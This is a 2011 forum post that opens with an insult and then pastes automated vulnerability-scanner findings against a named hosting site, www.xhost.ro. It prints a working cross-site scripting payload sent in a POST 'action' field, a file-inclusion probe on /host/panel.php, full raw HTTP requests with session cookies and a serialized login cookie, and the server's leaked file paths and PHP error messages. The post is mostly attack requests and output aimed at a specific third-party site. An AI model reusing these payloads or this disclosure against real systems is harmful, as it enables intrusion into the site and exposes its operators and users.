Daddymx79 Posted April 20, 2011 Report Posted April 20, 2011 Ustupid MFU to suport show details Apr 2 This vulnerability affects /host/phrame.php. Discovered by: Scripting (XSS.script).URL encoded POST input action was set to 1<ScRiPt >prompt(946395)</ScRiPt>POST /host/phrame.php HTTP/1.1Content-Length: 131Content-Type: application/x-www-form-urlencodedCookie: PHPSESSID=gjk9h978ygb9797h98h99h9898; toplabs=a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A20%3A%22ceva%40cevaa.ro%22%3Bs%3A4%3A%22pass%22%3Bs%3A44%3A%22O77777777777encodebase64%3D%22%3Bs%3A2%3A%22no%22%3Bi%3A10%3B%7DHost: www.xhost.roConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +Bing Help Home)action=1%3cScRiPt%20%3eprompt%28946395%29%3c%2fScRiPt%3e&isCripted=&password=parola&rememberMy=on&username=ceva@ceva.roNotice: No mappings found for action '1' in /home/www/lib/phrame/ActionController.php on line 128Fatal error: Call to a member function getName() on a non-object in /home/www/lib/phrame/ActionController.php on line 144/host/index.php?view=1some_inexistent_file_with_long_name HTTP/1.1Cookie: PHPSESSID=11111111111111111111111111; toplabs=a%3A3%3A%7Bs%3A4%3A%22user%22%3Bs%3A20%3A%22ceva%40ceva.ro22%3Bs%3A4%3A%22pass%22%3Bs%3A44%3A%22encodebase64O%3A2%3A%22no%22%3Bi%3A10%3B%7DHost: www.xhost.roConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (compatible; bingbot/2.0; +Bing Help Home)This vulnerability affects /host/panel.php. Discovered by: Scripting (File_Inclusion.script).<b>Warning</b>: file_get_contents(1some_inexistent_file_with_long_name) [<a href='function.file-get-contents'>function.file-get-contents</a>]: failed to open stream: No such file or directory in <b>/home/www/lib/toplabs/ui/Page.php</b> on line <b>286</b>GET /host/panel.php?view=1some_inexistent_file_with_long_name HTTP/1.1Cookie: Warning: file_get_contents(1some_inexistent_file_with_long_name) [function.file-get-contents]: failed to open stream: No such file or directory in /home/www/lib/toplabs/ui/Page.php on line 286Warning: DOMDocument::loadXML() [domdocument.loadxml]: Empty string supplied as input in /home/www/lib/toplabs/ui/Page.php on line 299Warning: Invalid Document in /home/www/lib/toplabs/ui/Page.php on line 304Warning: XSLTProcessor::transformToXml() [xsltprocessor.transformtoxml]: No stylesheet associated to this object in /home/www/lib/toplabs/ui/Page.php on line 313Warning: file_get_contents(1some_inexistent_file_with_long_name) [function.file-get-contents]: failed to open stream: No such file or directory in /home/www/lib/toplabs/ui/Page.php on line 286Warning: DOMDocument::loadXML() [domdocument.loadxml]: Empty string supplied as input in /home/www/lib/toplabs/ui/Page.php on line 299Warning: Invalid Document in /home/www/lib/toplabs/ui/Page.php on line 304Warning: XSLTProcessor::transformToXml() [xsltprocessor.transformtoxml]: No stylesheet associated to this object in /home/www/lib/toplabs/ui/Page.php on line 313This vulnerability affects /host/phrame.php. Discovered by: Scripting (Error_Message.script).Attack detailsURL encoded POST input action was set to Error message found: <b>Fatal error</b>: Call to a member function getName() on a non-object in <b>/home/www/lib/phrame/ActionController.php</b> on line <b>144</b><br />Notice: No mappings found for action '' in /home/www/lib/phrame/ActionController.php on line 128Fatal error: Call to a member function getName() on a non-object in /home/www/lib/phrame/ActionController.php on line 144Warning: file_get_contents(1some_inexistent_file_with_long_name) [function.file-get-contents]: failed to open stream: No such file or directory in /home/www/lib/toplabs/ui/Page.php on line 286Warning: DOMDocument::loadXML() [domdocument.loadxml]: Empty string supplied as input in /home/www/lib/toplabs/ui/Page.php on line 299Warning: Invalid Document in /home/www/lib/toplabs/ui/Page.php on line 304Warning: XSLTProcessor::transformToXml() [xsltprocessor.transformtoxml]: No stylesheet associated to this object in /home/www/lib/toplabs/ui/Page.php on line 313